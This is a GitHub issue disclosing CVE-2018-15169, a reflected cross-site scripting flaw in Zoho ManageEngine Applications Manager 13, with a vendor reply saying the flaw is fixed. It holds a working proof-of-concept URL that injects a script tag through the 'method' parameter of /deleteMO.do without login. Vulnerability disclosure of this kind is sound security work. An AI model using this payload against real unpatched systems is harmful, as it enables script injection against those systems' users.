Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[CVE-2018-15169]Zoho manageengine Applications Manager Reflected XSS #3

Open
x-f1v3 opened this issue Jul 31, 2018 · 1 comment
Open

[CVE-2018-15169]Zoho manageengine Applications Manager Reflected XSS #3

x-f1v3 opened this issue Jul 31, 2018 · 1 comment

Comments

@x-f1v3
Copy link
Owner

x-f1v3 commented Jul 31, 2018
edited
Loading

Zoho manageengine Applications Manager 13 (13810 build) Reflected XSS

Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
CVE:CVE-2018-15169

I found a Reflected XSS in the Zoho ManageEngine Applications Manager 13 (13810 build) via the method parameter in /deleteMO.do?listview=true&method=deleteMO&viewmontype= GET request.

Proof of Concept

/deleteMO.do?listview=true&method=deleteMO</textarea><script>alert(document.domain)</script>//&viewmontype=

Local test:
image

Demo site test:
image

Notice: This vul can reproduce without login.

The vendor has fixed the vulnerability:
https://www.manageengine.com/products/applications_manager/issues.html
@x-f1v3 x-f1v3 changed the title Zoho manageengine Applications Manager 13 (13810 build) Reflected XSS [CVE-2018-15169]Zoho manageengine Applications Manager 13 (13810 build) Reflected XSS Aug 8, 2018
@x-f1v3 x-f1v3 changed the title [CVE-2018-15169]Zoho manageengine Applications Manager 13 (13810 build) Reflected XSS [CVE-2018-15169]Zoho manageengine Applications Manager Reflected XSS Aug 8, 2018
@Priyankaroy93
Copy link

We apologise for the inconvenience this may have caused to our customers.
These issues were fixed in July itself, with the release of version 13820. Please upgrade to the latest version from here: http://bit.ly/APMDownload

ManageEngine

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@x-f1v3 @Priyankaroy93